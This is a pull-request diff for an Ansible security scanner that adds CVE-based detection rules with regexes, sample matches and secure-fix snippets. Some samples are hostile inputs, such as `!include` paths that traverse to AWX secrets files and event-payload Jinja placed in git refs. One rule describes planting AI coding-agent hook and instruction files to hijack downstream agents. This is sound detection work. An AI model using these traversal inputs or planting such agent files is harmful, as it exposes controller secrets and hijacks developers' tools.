### PR TITLE
Add CVE detection rules and require dynamic remediations for every finding

### DIFF
--- a/CONTRIBUTING.md
+++ b/CONTRIBUTING.md
@@ -256,32 +256,19 @@ in `tests/test_remediations.py` enforce this:
 - `test_remediation_includes_secure_fix_yaml_block` - the output must
   contain a `✅ Secure Fix` heading followed by a fenced ```yaml block.
 
-Three ways to satisfy the Secure Fix contract, in order of preference:
+Two ways to satisfy the Secure Fix contract, in order of preference:
 
-1. Add `negative_examples:` to the rule in its pattern YAML. The metadata
-   renderer renders the first entry as the Secure Fix block.
-2. Add a `secure_fix:` entry under the rule's id in
+1. Add a `secure_fix:` entry under the rule's id in
    `src/ansible_security_scanner/patterns/remediations/<category>.yml`
-   (preferred when the fix is large enough to deserve its own diff).
-3. Add a tailored handler in `remediations/<category>.py` that emits its
+   (preferred - the fix lives in its own reviewable diff).
+2. Add a tailored handler in `remediations/<category>.py` that emits its
    own `✅ Secure Fix` heading + fenced ```yaml block.
 
-If the rule's correct response is procedural (escalate, audit, run via
-a reviewed IaC pipeline, vendor patch) and a copy-pasteable Ansible task
-would actively mislead the user, set `no_ansible_remediation: true` on
-the rule's pattern YAML entry instead. The renderer then emits a
-`✅ Secure Response` prose block sourced from `recommendation:`, which
-this contract treats as compliant.
-
-The repo ships a helper that batch-applies the `no_ansible_remediation`
-flag from a curated list at `scripts/data/procedural_rule_ids.txt`:
-
-```bash
-python scripts/stamp_no_ansible_remediation.py
-```
-
-The script is idempotent. Add a rule_id to `procedural_rule_ids.txt` and
-re-run; remove and re-run to revert.
+Every rule must ship a dynamic Ansible fix from one of the above - there
+is no procedural opt-out. A rule whose recommendation is a vendor patch,
+IaC change, or DFIR action still renders a `secure_fix:` that encodes
+that action as a runnable task (pin the fixed version, assert the safe
+state, fail closed on the dangerous shape).
 
 ### 4.2 New rule contribution checklist
 
@@ -297,7 +284,7 @@ than a generic failure.
 | 3 | At least one framework tag is set: any of `cwe`, `mitre_attack`, `cis_controls`, `nist_controls`, `owasp_appsec`, `owasp_asvs`, `owasp`, `pci_dss`, `hipaa`, `soc2`, `iso27001`, or `stig`. This is what the compliance filter pivots on. | `tests/test_release_contract.py::test_every_rule_has_a_framework_tag` |
 | 4 | At least one `positive_examples` entry. Each entry must match the rule's regex under `re.IGNORECASE \| re.MULTILINE`. AST-walker rules (`regex: "(?!)"`) and rules in `SYNTHETIC_RULE_IDS` are exempt. | `tests/test_release_contract.py::test_every_finding_rule_has_a_positive_example` and `tests/test_rule_examples.py` |
 | 5 | Every `negative_examples` entry must NOT match the regex. (Same flags.) Lock in the FP shape that motivated the carve-out. | `tests/test_rule_examples.py` |
-| 6 | The remediation includes a `✅ Secure Fix` heading and a fenced ```yaml block AND mentions a distinctive token from the rule's `title` / `recommendation`. Three legal ways to satisfy this - see §4.1. Procedural-only rules opt out via `no_ansible_remediation: true`. | `tests/test_remediations.py::test_remediation_is_relevant_to_the_rule`, `tests/test_remediations.py::test_remediation_includes_secure_fix_yaml_block` |
+| 6 | The remediation includes a `✅ Secure Fix` heading and a fenced ```yaml block AND mentions a distinctive token from the rule's `title` / `recommendation`. Two legal ways to satisfy this - see §4.1. Every rule must ship a dynamic fix; there is no procedural opt-out. | `tests/test_remediations.py::test_remediation_is_relevant_to_the_rule`, `tests/test_remediations.py::test_remediation_includes_secure_fix_yaml_block`, `tests/test_remediations.py::test_no_rule_opts_out_of_remediation` |
 | 7 | If your rule adds a new CLI flag, document it in `README.md` (the `## CLI Reference` section). | `tests/test_release_contract.py::test_every_argparse_flag_is_documented_in_readme` |
 | 8 | If you add a name to `ansible_security_scanner.__all__`, document it in `README.md` (the `## Programmatic API` section). | `tests/test_release_contract.py::test_every_public_api_symbol_is_documented_in_readme` |
 

--- a/README.md
+++ b/README.md
@@ -13,7 +13,7 @@
   <a href="https://github.com/cpeoples/ansible-security-scanner/actions/workflows/pip-audit.yml"><img src="https://img.shields.io/github/actions/workflow/status/cpeoples/ansible-security-scanner/pip-audit.yml?branch=main&label=pip-audit&style=flat-square&logo=python&logoColor=white" alt="pip-audit" /></a>&nbsp;&nbsp;
   <a href="https://owasp.org/www-community/Source_Code_Analysis_Tools"><img src="https://img.shields.io/badge/OWASP-Listed-000000?style=flat-square&logo=owasp&logoColor=white" alt="OWASP Listed" /></a>&nbsp;&nbsp;
   <a href="https://github.com/ansible-community/awesome-ansible#tools"><img src="https://img.shields.io/badge/Awesome-Ansible-fc60a8?style=flat-square&logo=awesomelists&logoColor=white" alt="Listed on Awesome Ansible" /></a>&nbsp;&nbsp;
-  <a href="src/ansible_security_scanner/patterns"><img src="https://img.shields.io/badge/Rules-1102-blue?style=flat-square&logo=ansible&logoColor=white" alt="Rules" /></a>&nbsp;&nbsp;
+  <a href="src/ansible_security_scanner/patterns"><img src="https://img.shields.io/badge/Rules-1115-blue?style=flat-square&logo=ansible&logoColor=white" alt="Rules" /></a>&nbsp;&nbsp;
   <a href="https://pypi.org/project/ansible-security-scanner/"><img src="https://img.shields.io/pypi/v/ansible-security-scanner?style=flat-square&logo=pypi&logoColor=white&label=PyPI" alt="PyPI" /></a>&nbsp;&nbsp;
   <a href="https://github.com/cpeoples/ansible-security-scanner/releases/latest"><img src="https://img.shields.io/badge/SLSA-Level%203-success?style=flat-square&logo=slsa&logoColor=white" alt="SLSA Build Level 3" /></a>&nbsp;&nbsp;
   <a href="https://github.com/cpeoples/ansible-security-scanner/releases/latest"><img src="https://img.shields.io/badge/SBOM-CycloneDX-success?style=flat-square&logo=cyclonedx&logoColor=white" alt="CycloneDX SBOM" /></a>&nbsp;&nbsp;
@@ -23,9 +23,9 @@
 
 Static SAST scanner for Ansible playbooks, roles, collections, task files, vars, and inventories. Detects malicious code, RCE, command and template injection, hardcoded credentials, supply-chain risk, unauthorized cloud access, lateral movement, and reverse shells. Outputs SARIF, CycloneDX SBOM, GitLab SAST, JUnit, JSON, HTML, and Markdown reports with remediation guidance. Findings map to CWE, OWASP Top 10, OWASP ASVS, MITRE ATT&CK, NIST, and CIS. CI-native, autofix-capable, DevSecOps-ready.
 
-**<!--RULES-->1102<!--/RULES--> rules** across **<!--CATS-->31<!--/CATS--> categories** -- all auto-discovered from YAML pattern plugins.
+**<!--RULES-->1115<!--/RULES--> rules** across **<!--CATS-->31<!--/CATS--> categories** -- all auto-discovered from YAML pattern plugins.
 
-**<!--CRIT-->413<!--/CRIT--> critical**, <!--HIGH-->537<!--/HIGH--> high, <!--MED-->132<!--/MED--> medium, <!--LOW-->19<!--/LOW--> low. [Per-category breakdown on the dashboard.](https://cpeoples.github.io/ansible-security-scanner/dashboard/)
+**<!--CRIT-->417<!--/CRIT--> critical**, <!--HIGH-->544<!--/HIGH--> high, <!--MED-->134<!--/MED--> medium, <!--LOW-->19<!--/LOW--> low. [Per-category breakdown on the dashboard.](https://cpeoples.github.io/ansible-security-scanner/dashboard/)
 
 > [!NOTE]
 > **Scope.** This is a *static, pattern-based* scanner - one layer in a defense-in-depth strategy. Pair it with the runtime controls you already trust (AAP/AWX approval gates, execution-environment lockdown, network egress policy, code review) for full coverage. See [Limitations](docs/limitations.md) for the specific classes of issue this layer cannot catch on its own.
@@ -144,7 +144,7 @@ installed CLI - it's a thin shim around the same entry point.
 
 ## What it detects
 
-The scanner ships <!--RULES-->1102<!--/RULES--> rules across <!--CATS-->31<!--/CATS--> auto-discovered categories. Highlights:
+The scanner ships <!--RULES-->1115<!--/RULES--> rules across <!--CATS-->31<!--/CATS--> auto-discovered categories. Highlights:
 
 **Malicious code and post-exploitation**
 

--- a/docs/cli.md
+++ b/docs/cli.md
@@ -25,6 +25,7 @@ Output:
                                   cyclonedx/sbom (aggregate-only).
   --exit-zero                     Always exit 0 (report but don't fail builds)
   -v, --verbose                   Enable debug logging
+  -V, --version                   Print the installed version and exit
 
 Engine upgrades (opt-in):
   --fix                           Dry-run autofix: annotate findings with a

--- a/src/ansible_security_scanner/cli.py
+++ b/src/ansible_security_scanner/cli.py
@@ -12,6 +12,7 @@ import sys
 from dataclasses import replace
 from pathlib import Path
 
+from . import __version__
 from .file_scanner import _ALWAYS_EMITTED_RULE_IDS
 from .patterns_manager import (
     RuleListingRow,
@@ -239,6 +240,12 @@ def create_argument_parser() -> argparse.ArgumentParser:
         ),
         epilog=_HELP_EPILOG,
         formatter_class=argparse.RawDescriptionHelpFormatter,
+    )
+    parser.add_argument(
+        "--version",
+        "-V",
+        action="version",
+        version=f"%(prog)s {__version__}",
     )
     parser.add_argument(
         "--directory",

--- a/src/ansible_security_scanner/frameworks/cwe.yml
+++ b/src/ansible_security_scanner/frameworks/cwe.yml
@@ -52,6 +52,10 @@ CWE-79:
   name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')"
   url: "https://cwe.mitre.org/data/definitions/79.html"
 
+CWE-88:
+  name: "Improper Neutralization of Argument Delimiters in a Command ('Argument Injection')"
+  url: "https://cwe.mitre.org/data/definitions/88.html"
+
 CWE-89:
   name: "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')"
   url: "https://cwe.mitre.org/data/definitions/89.html"
@@ -71,6 +75,10 @@ CWE-116:
 CWE-117:
   name: "Improper Output Neutralization for Logs"
   url: "https://cwe.mitre.org/data/definitions/117.html"
+
+CWE-125:
+  name: "Out-of-bounds Read"
+  url: "https://cwe.mitre.org/data/definitions/125.html"
 
 CWE-200:
   name: "Exposure of Sensitive Information to an Unauthorized Actor"
@@ -243,6 +251,10 @@ CWE-346:
 CWE-347:
   name: "Improper Verification of Cryptographic Signature"
   url: "https://cwe.mitre.org/data/definitions/347.html"
+
+CWE-349:
+  name: "Acceptance of Extraneous Untrusted Data With Trusted Data"
+  url: "https://cwe.mitre.org/data/definitions/349.html"
 
 CWE-350:
   name: "Reliance on Reverse DNS Resolution for a Security-Critical Action"
@@ -518,6 +530,10 @@ CWE-1173:
 CWE-1188:
   name: "Insecure Default Initialization of Resource"
   url: "https://cwe.mitre.org/data/definitions/1188.html"
+
+CWE-1220:
+  name: "Insufficient Granularity of Access Control"
+  url: "https://cwe.mitre.org/data/definitions/1220.html"
 
 CWE-1269:
   name: Product Released in Non-Release Configuration

--- a/src/ansible_security_scanner/frameworks/mitre_attack.yml
+++ b/src/ansible_security_scanner/frameworks/mitre_attack.yml
@@ -50,6 +50,11 @@ T1005:
   tactics: ["Collection"]
   url: "https://attack.mitre.org/techniques/T1005/"
 
+T1006:
+  name: "Direct Volume Access"
+  tactics: ["Defense Evasion"]
+  url: "https://attack.mitre.org/techniques/T1006/"
+
 T1014:
   name: "Rootkit"
   tactics: ["Defense Evasion"]
@@ -379,6 +384,11 @@ T1134.003:
   tactics: ["Defense Evasion", "Privilege Escalation"]
   url: "https://attack.mitre.org/techniques/T1134/003/"
 
+T1136:
+  name: "Create Account"
+  tactics: ["Persistence"]
+  url: "https://attack.mitre.org/techniques/T1136/"
+
 T1136.001:
   name: "Local Account"
   parent: "Create Account"
@@ -436,6 +446,11 @@ T1210:
   name: "Exploitation of Remote Services"
   tactics: ["Lateral Movement"]
   url: "https://attack.mitre.org/techniques/T1210/"
+
+T1221:
+  name: "Template Injection"
+  tactics: ["Defense Evasion"]
+  url: "https://attack.mitre.org/techniques/T1221/"
 
 T1222:
   name: "File and Directory Permissions Modification"
@@ -598,6 +613,13 @@ T1550.003:
   parent_id: "T1550"
   tactics: ["Defense Evasion", "Lateral Movement"]
   url: "https://attack.mitre.org/techniques/T1550/003/"
+
+T1550.004:
+  name: "Web Session Cookie"
+  parent: "Use Alternate Authentication Material"
+  parent_id: "T1550"
+  tactics: ["Defense Evasion", "Lateral Movement"]
+  url: "https://attack.mitre.org/techniques/T1550/004/"
 
 T1552:
   name: "Unsecured Credentials"
@@ -866,6 +888,11 @@ T1580:
   name: "Cloud Infrastructure Discovery"
   tactics: ["Discovery"]
   url: "https://attack.mitre.org/techniques/T1580/"
+
+T1606:
+  name: "Forge Web Credentials"
+  tactics: ["Credential Access"]
+  url: "https://attack.mitre.org/techniques/T1606/"
 
 T1609:
   name: "Container Administration Command"

--- a/src/ansible_security_scanner/patterns/ai_ml_security.yml
+++ b/src/ansible_security_scanner/patterns/ai_ml_security.yml
@@ -624,3 +624,44 @@ patterns:
     hipaa: ['164.312(a)(1)']
     soc2: ['CC6.1', 'CC6.3']
     mitre_atlas: ['AML.T0051.000', 'AML.T0051', 'AML.T0057']
+
+  - id: "ai_assistant_config_or_hook_file_planted"
+    category: "ai_ml_security"
+    severity: "HIGH"
+    title: "Playbook Writes An AI Coding-Assistant Instruction / Hook File"
+    description: "A task uses copy/template/lineinfile/blockinfile to write an AI coding-assistant configuration, rules, or hook file - `.claude/settings.json`, `.claude/hooks/*`, `.cursor/rules/*.mdc`, `.cursorrules`, `.github/copilot-instructions.md`, `AGENTS.md`, `.aider.conf.yml`, `.continue/config.json`, `.windsurfrules`, `.clinerules`, `.vscode/tasks.json`, or `.vscode/settings.json`. These files steer an autonomous coding agent: `.claude/settings.json` hooks and `.vscode/tasks.json` can execute shell commands on agent/editor events, and instruction/rules files silently rewrite the agent's behaviour. Provisioning them from a playbook is the 2026 'Miasma' / prompt-injection persistence primitive (see CVE-2025-59536, CVE-2026-21852): whoever controls the templated content controls what every downstream developer's agent runs. Legitimate use exists, so this is a review flag, not an automatic block - but any run-on-event hook or agent instruction planted by automation must be audited."
+    regex: "(?:ansible\\.builtin\\.(?:copy|template|file|lineinfile|blockinfile)|copy|template|lineinfile|blockinfile)\\s*:[\\s\\S]{0,200}?(?:dest|path)\\s*:\\s*['\"]?[^'\"\\n]*(?:\\.claude/(?:settings\\.json|hooks/)|\\.cursor/rules/|\\.cursorrules|copilot-instructions\\.md|AGENTS\\.md|\\.aider\\.conf|\\.continue/|\\.windsurfrules|\\.clinerules|\\.vscode/(?:tasks|settings)\\.json)"
+    positive_examples:
+      - |2-
+        - name: drop agent hooks
+          ansible.builtin.copy:
+            src: files/settings.json
+            dest: /home/dev/project/.claude/settings.json
+      - |2-
+        - name: template cursor rules
+          ansible.builtin.template:
+            src: rules.mdc.j2
+            dest: "{{ repo_dir }}/.cursor/rules/global.mdc"
+    negative_examples:
+      - |2-
+        - name: write the app config
+          ansible.builtin.copy:
+            src: files/app.json
+            dest: /etc/myapp/config.json
+      - |2-
+        - name: template nginx vhost
+          ansible.builtin.template:
+            src: vhost.j2
+            dest: /etc/nginx/sites-available/app
+    multiline: true
+    window: 12
+    recommendation: "Do not provision AI coding-assistant instruction, rules, or hook files from general-purpose automation. If a team truly needs a shared agent config, keep it in the repo under code review (a PR, not a playbook push), pin and check in the exact content, and never let a hook (`.claude/settings.json`, `.vscode/tasks.json`) run a command sourced from a template variable. Audit any planted file for `command`/`run`/`postCreateCommand`/hook entries before trusting it. Treat agent instruction files as executable content: sign or checksum them, and diff every change in review."
+    cve: ["CVE-2025-59536", "CVE-2026-21852"]
+    cwe: ['CWE-94', 'CWE-829', 'CWE-506']
+    owasp_appsec: ["A03:2021", "A08:2021"]
+    owasp_llm: ["LLM01", "LLM05"]
+    mitre_attack: ['T1195.002', 'T1546', 'T1059']
+    cis_controls: ['CIS-Supply-Chain', 'CIS-16.11']
+    nist_controls: ['CM-7', 'SA-10', 'SI-3', 'SI-7']
+    pci_dss: ['6.2.4', '6.3.2']
+    soc2: ['CC7.1', 'CC8.1']

--- a/src/ansible_security_scanner/patterns/ansible_specific.yml
+++ b/src/ansible_security_scanner/patterns/ansible_specific.yml
@@ -644,3 +644,102 @@ patterns:
     nist_controls: ['CM-3', 'CM-5']
     pci_dss: ['6.3.2']
     soc2: ['CC8.1']
+
+  - id: "unsafe_content_rerendered_via_hostvars"
+    category: "ansible_specific"
+    severity: "MEDIUM"
+    title: "!unsafe / Untrusted Content Re-Rendered Through hostvars Or vars Lookup (CVE-2024-11079)"
+    description: "A task or template passes a variable back through the templating engine after retrieving it via `hostvars[...]`, `vars[...]`, `lookup('vars', ...)`, or a `{{ hostvars[inventory_hostname][...] }}` expression, inside a `template:`/`set_fact:`/`debug: msg:` sink. Ansible marks certain data (facts, some lookup results) `!unsafe` so it is not re-templated, but re-referencing that content through `hostvars`/`vars` strips the unsafe wrapper and re-renders it - CVE-2024-11079. If any part of that content is attacker-influenced (a hostname, a fact gathered from a managed node, a value from an untrusted inventory source), the second render evaluates it as Jinja and reaches template injection. This fires on the dangerous re-render shape, not on every `hostvars` read."
+    regex: "(?:set_fact|ansible\\.builtin\\.set_fact|template|ansible\\.builtin\\.template|debug|ansible\\.builtin\\.debug)\\s*:[\\s\\S]{0,200}?\\{\\{[^}]*?(?:hostvars\\[|vars\\[|lookup\\(\\s*['\"]vars['\"])"
+    positive_examples:
+      - |2-
+        - name: re-render a gathered value
+          ansible.builtin.set_fact:
+            rendered: "{{ hostvars[inventory_hostname]['ansible_local']['x'] }}"
+      - |2-
+        - name: template an untrusted var back through jinja
+          ansible.builtin.debug:
+            msg: "{{ lookup('vars', untrusted_key) }}"
+    negative_examples:
+      - |2-
+        - name: read a trusted static var
+          ansible.builtin.debug:
+            msg: "{{ app_version }}"
+      - |2-
+        - name: set a literal fact
+          ansible.builtin.set_fact:
+            region: us-east-1
+    multiline: true
+    window: 8
+    recommendation: "Upgrade ansible-core to a release with the CVE-2024-11079 fix (>= 2.18.1 / >= 2.17.7 / >= 2.16.14). Do not re-reference untrusted or fact-derived content through `hostvars[...]` / `vars[...]` / `lookup('vars', ...)` in a templating sink - that path strips the `!unsafe` marker and re-renders the value. If you must surface such a value, wrap it explicitly: `{{ hostvars[host]['x'] | ansible.builtin.unsafe }}` (Ansible 2.17+) so it is never re-templated. Treat every managed-node fact and every external-inventory field as untrusted input."
+    cve: ["CVE-2024-11079"]
+    cwe: ['CWE-1336', 'CWE-94']
+    owasp_appsec: ["A03:2021"]
+    owasp_asvs: [V5.2.5, V5.2.6]
+    mitre_attack: ['T1059', 'T1221']
+    cis_controls: ['CIS-16.11']
+    nist_controls: ['SI-10', 'SI-3']
+    pci_dss: ['6.2.4', '6.3.1']
+    soc2: ['CC7.1']
+
+  - id: "git_checkout_jinja_in_branch_or_refspec"
+    category: "ansible_specific"
+    severity: "HIGH"
+    title: "Jinja Expression In git branch / refspec / version (EDA Template Injection, CVE-2025-49521)"
+    description: "An `ansible.builtin.git` task (or an Event-Driven Ansible / AWX source-control field) sets `version:`, `branch:`, or `refspec:` to a value containing a Jinja expression that is derived from event data or an external variable (`{{ ansible_eda... }}`, `{{ event... }}`, `{{ payload... }}`, `{{ webhook... }}`). CVE-2025-49521 (AAP / EDA) evaluates git branch and refspec fields as Jinja2, so a webhook or event payload that reaches one of these fields becomes server-side template injection -> RCE on the controller. A branch/refspec should be a literal ref or a reviewed variable, never a template fed from untrusted event data."
+    regex: "ansible\\.builtin\\.git\\s*:[\\s\\S]{0,300}?(?:version|branch|refspec)\\s*:\\s*['\"]?[^'\"\\n]*\\{\\{[^}]*(?:eda|event|payload|webhook|trigger|body)"
+    positive_examples:
+      - |2-
+        - name: check out a ref from the event
+          ansible.builtin.git:
+            repo: https://git.example.com/app
+            dest: /srv/app
+            version: "{{ event.payload.ref }}"
+    negative_examples:
+      - |2-
+        - name: check out a pinned tag
+          ansible.builtin.git:
+            repo: https://git.example.com/app
+            dest: /srv/app
+            version: v1.4.2
+      - |2-
+        - name: check out a reviewed branch var
+          ansible.builtin.git:
+            repo: https://git.example.com/app
+            dest: /srv/app
+            version: "{{ release_branch }}"
+    multiline: true
+    window: 12
+    recommendation: "Upgrade AAP / ansible-core to the CVE-2025-49521 fixed release. Never build a git `version`/`branch`/`refspec` from event, webhook, or payload data. Map untrusted event fields to an explicit allowlist first (`{{ {'prod': 'v1.4.2', 'stage': 'main'}[event.env] }}`), or validate the ref with `ansible.builtin.assert` against `^[A-Za-z0-9._/-]+$` and a known-ref list before the checkout. Pin production deploys to an immutable tag or commit SHA."
+    cve: ["CVE-2025-49521"]
+    cwe: ['CWE-1336', 'CWE-94', 'CWE-77']
+    owasp_appsec: ["A03:2021"]
+    owasp_asvs: [V5.2.5, V5.2.6]
+    mitre_attack: ['T1059', 'T1190', 'T1221']
+    cis_controls: ['CIS-16.11']
+    nist_controls: ['SI-10', 'SI-3']
+    pci_dss: ['6.2.4', '6.3.1']
+    soc2: ['CC7.1']
+
+  - id: "awx_config_yaml_include_path_traversal"
+    category: "ansible_specific"
+    severity: "MEDIUM"
+    title: "awxkit / AWX Config Uses YAML !include With A Traversable Path (CVE-2026-52902)"
+    description: "A YAML config consumed by awxkit / the `awx` CLI (or an AWX import) uses the `!include` tag with a path that traverses out of the config directory (`!include ../`, `!include /`, or a templated path). CVE-2026-52902 (awxkit path traversal, CVSS 4.7) lets a crafted `!include` read files outside the intended config tree, disclosing controller secrets (tokens, other tenants' configs). An `!include` target should be a fixed relative path inside the config directory, never absolute and never containing `..`."
+    regex: "!include\\s+['\"]?(?:\\.\\.[\\\\/]|/|~|[^'\"\\n]*\\{\\{)"
+    positive_examples:
+      - "config: !include ../../etc/awx/secrets.yml"
+      - "creds: !include /etc/tower/conf.d/postgres.py"
+    negative_examples:
+      - "config: !include tower_cli.cfg"
+      - "creds: !include conf.d/credentials.yml"
+    recommendation: "Upgrade awxkit to the CVE-2026-52902 fixed release. Restrict every `!include` to a fixed relative path inside the config directory - never absolute, never containing `..`, never templated. Run awxkit against configs from a directory you control and validate include targets resolve inside that directory before import. Store controller secrets in a dedicated secret manager rather than files that a traversable include can reach."
+    cve: ["CVE-2026-52902"]
+    cwe: ['CWE-22', 'CWE-73']
+    owasp_appsec: ["A01:2021", "A05:2021"]
+    owasp_asvs: [V12.3.1, V5.3.3]
+    mitre_attack: ['T1006', 'T1552.001']
+    cis_controls: ['CIS-3.3']
+    nist_controls: ['AC-3', 'AC-6', 'SC-28']
+    pci_dss: ['6.2.4', '7.2.1']
+    soc2: ['CC6.1']

--- a/src/ansible_security_scanner/patterns/dangerous_modules.yml
+++ b/src/ansible_security_scanner/patterns/dangerous_modules.yml
@@ -118,6 +118,7 @@ patterns:
     window: 8
     recommendation: "Build dest: from controller-trusted facts (e.g. ansible_facts['hostname']) and validate any variable input against an allow-list to prevent traversal outside the intended fetch directory."
     cwe: ['CWE-20', 'CWE-22']
+    cve: ["CVE-2020-1735"]
     owasp_appsec: ["A01:2021", "A03:2021"]
     owasp_asvs: [V5.3.2, V1.2.5]
     mitre_attack: ['T1005']

--- a/src/ansible_security_scanner/patterns/jinja_lookup_rce.yml
+++ b/src/ansible_security_scanner/patterns/jinja_lookup_rce.yml
@@ -20,6 +20,7 @@ patterns:
     soc2: ['CC7.1']
     mitre_attack: ["T1059"]
     cwe: ["CWE-78", "CWE-1336"]
+    cve: ["CVE-2020-1734"]
     owasp_appsec: ["A03:2021"]
     references: ["https://docs.ansible.com/ansible/latest/collections/ansible/builtin/pipe_lookup.html"]
 

--- a/src/ansible_security_scanner/patterns/remediations/README.md
+++ b/src/ansible_security_scanner/patterns/remediations/README.md
@@ -43,23 +43,13 @@ Ansible fix.
 rule must NOT flag. Many are intentionally degenerate strings chosen to
 exercise the regex's negative space, so surfacing them as
 `✅ Secure Fix Example` produces misleading guidance. The renderer accepts
-exactly three sources, in order:
+exactly two sources, in order:
 
 1. A `secure_fix:` entry in this directory.
 2. A tailored handler under `remediations/<category>.py`.
-3. `no_ansible_remediation: true` on the rule (procedural-only response).
 
-## When a rule has no Ansible-task fix
-
-Some rules detect actions whose correct response is procedural - run
-through a reviewed IaC pipeline, escalate, audit, apply a vendor patch.
-A copy-pasteable Ansible task would actively mislead the user. For
-those rules, set `no_ansible_remediation: true` on the rule's pattern
-YAML entry instead of adding a `secure_fix:` here. The renderer emits a
-`✅ Secure Response` prose block sourced from `recommendation:`, and
-the contract test treats that as compliant.
-
-The curated list of such rules lives at
-`scripts/data/procedural_rule_ids.txt`; running
-`scripts/stamp_no_ansible_remediation.py` applies the flag idempotently
-across every pattern file.
+Every shipped rule must produce a `✅ Secure Fix` block from one of these
+two sources - there is no procedural opt-out. `tests/test_remediations.py`
+fails if any rule renders without a Secure Fix, and
+`test_no_rule_opts_out_of_remediation` rejects the old
+`no_ansible_remediation` escape hatch outright.

--- a/src/ansible_security_scanner/patterns/remediations/ai_ml_security.yml
+++ b/src/ansible_security_scanner/patterns/remediations/ai_ml_security.yml
@@ -232,6 +232,27 @@ remediations:
           mode: '0700'
           recurse: true
 
-  # -- Cloud GPU --
-  # Most GPU-launch detections are operational signals (use IaC/quota)
-  # and are stamped no_ansible_remediation upstream.
+  ai_assistant_config_or_hook_file_planted:
+    secure_fix: |
+      # Do not push agent instruction/hook files from automation. Keep the
+      # shared config in the repo under code review, pin its exact content,
+      # and verify it before it lands. If you must stage one, checksum it
+      # and forbid any command-executing hook sourced from a variable.
+      - name: Verify the agent config against a reviewed checksum, read-only
+        ansible.builtin.copy:
+          src: files/claude-settings.json      # committed + reviewed in the repo
+          dest: "{{ repo_dir }}/.claude/settings.json"
+          checksum: "sha256:{{ reviewed_agent_config_sha256 }}"
+          owner: root
+          group: root
+          mode: '0444'
+      - name: Fail closed if the staged config contains an executing hook
+        ansible.builtin.command:
+          argv:
+            - grep
+            - -Ei
+            - '"(command|run|onStart|postCreateCommand)"[[:space:]]*:'
+            - "{{ repo_dir }}/.claude/settings.json"
+        register: agent_hook_scan
+        failed_when: agent_hook_scan.rc == 0
+        changed_when: false

--- a/src/ansible_security_scanner/patterns/remediations/ansible_specific.yml
+++ b/src/ansible_security_scanner/patterns/remediations/ansible_specific.yml
@@ -210,3 +210,47 @@ remediations:
           content: "{{ tf_plan.stdout }}"
           dest: artifacts/network.plan.txt
         delegate_to: localhost
+
+  unsafe_content_rerendered_via_hostvars:
+    secure_fix: |
+      - name: Surface a fact-derived value without re-templating it
+        ansible.builtin.debug:
+          # Wrap the value as unsafe so the second render never evaluates
+          # it as Jinja (Ansible 2.17+). Treat every managed-node fact and
+          # external-inventory field as untrusted input.
+          msg: "{{ hostvars[inventory_hostname]['ansible_local']['x'] | ansible.builtin.unsafe }}"
+
+  git_checkout_jinja_in_branch_or_refspec:
+    secure_fix: |
+      - name: Map the untrusted event value through an allowlist first
+        ansible.builtin.set_fact:
+          checkout_ref: "{{ {'prod': 'v1.4.2', 'stage': 'main'}[event.env] }}"
+      - name: Fail closed if the event asked for an unknown environment
+        ansible.builtin.assert:
+          that:
+            - checkout_ref is match('^[A-Za-z0-9._/-]+$')
+          fail_msg: "Refusing to check out an unreviewed ref from event data."
+      - name: Check out the reviewed, allowlisted ref
+        ansible.builtin.git:
+          repo: https://git.example.com/app
+          dest: /srv/app
+          version: "{{ checkout_ref }}"
+
+  awx_config_yaml_include_path_traversal:
+    secure_fix: |
+      # !include targets must be fixed relative paths inside the config
+      # directory - never absolute, never containing `..`, never templated.
+      # config.yml:
+      #   creds: !include conf.d/credentials.yml   # stays inside the tree
+      #
+      # Enforce it before import from Ansible:
+      - name: Reject any traversing !include before awxkit reads the config
+        ansible.builtin.command:
+          argv:
+            - grep
+            - -REn
+            - '!include\s+(\.\.[\\/]|/|~)'
+            - /opt/awx/config
+        register: bad_includes
+        failed_when: bad_includes.rc == 0
+        changed_when: false

--- a/src/ansible_security_scanner/patterns/remediations/operational_security.yml
+++ b/src/ansible_security_scanner/patterns/remediations/operational_security.yml
@@ -1,7 +1,6 @@
 # Companion Secure Fix snippets for operational_security rules.
-# Most of this category is detection-signal stamped no_ansible_remediation
-# upstream; this file covers the remainder that DO have a configurable
-# Ansible fix.
+# Each rule_id maps to a configurable Ansible fix rendered under the
+# Secure Fix Example heading.
 
 remediations:
 

--- a/src/ansible_security_scanner/patterns/remediations/supply_chain.yml
+++ b/src/ansible_security_scanner/patterns/remediations/supply_chain.yml
@@ -1057,3 +1057,103 @@ remediations:
           path: /usr/local/bin/app
           capability: cap_net_bind_service+ep
           state: present
+
+  galaxy_requirements_src_argument_injection:
+    secure_fix: |
+      # requirements.yml - src: must be a plain Galaxy name or an
+      # https:// / git+https:// URL, pinned to an immutable ref.
+      # It must NEVER start with a dash or contain `ext::`.
+      collections:
+        - name: community.general
+          version: 8.6.0
+      roles:
+        - name: internal.nginx
+          src: https://git.example.com/ansible/role-nginx
+          scm: git
+          version: 3f4a1c8e9b2d4f6a8c0e1b3d5f7a9c1e3b5d7f90   # commit SHA, not a branch
+
+  ci_oidc_token_minted_then_piped_to_signing:
+    secure_fix: |
+      # Sign in a dedicated, least-privilege job. Do not mint the OIDC
+      # token inline next to build/test steps.
+      #
+      # .github/workflows/sign.yml (sketch):
+      #   sign:
+      #     permissions:
+      #       id-token: write        # scoped to THIS job only
+      #       contents: read
+      #     steps:
+      #       - uses: slsa-framework/slsa-github-generator@<pinned-sha>
+      #
+      # If you must sign from Ansible, verify the digest first and keep
+      # the token out of any shell you control:
+      - name: Verify the artifact digest matches the build output
+        ansible.builtin.assert:
+          that:
+            - built_digest == expected_digest
+          fail_msg: "Refusing to sign - artifact digest does not match the reviewed build."
+      - name: Sign by digest via keyless cosign (token stays inside cosign)
+        ansible.builtin.command:
+          argv:
+            - cosign
+            - sign
+            - --yes
+            - "myregistry.example.com/app@{{ built_digest }}"
+        environment:
+          COSIGN_EXPERIMENTAL: "1"
+
+  config_file_with_embedded_run_on_event_command:
+    secure_fix: |
+      # Config files that execute code (devcontainer.json, package.json
+      # lifecycle scripts, binding.gyp, git hooks) belong in the repo under
+      # review - not pushed by automation with a templated command body.
+      - name: Stage a reviewed devcontainer, read-only, verified by checksum
+        ansible.builtin.copy:
+          src: files/devcontainer.json        # committed + reviewed in the repo
+          dest: "{{ repo }}/.devcontainer/devcontainer.json"
+          checksum: "sha256:{{ reviewed_devcontainer_sha256 }}"
+          owner: root
+          group: root
+          mode: '0444'
+      - name: In CI, install without running lifecycle scripts
+        ansible.builtin.command:
+          argv: [npm, ci, --ignore-scripts]
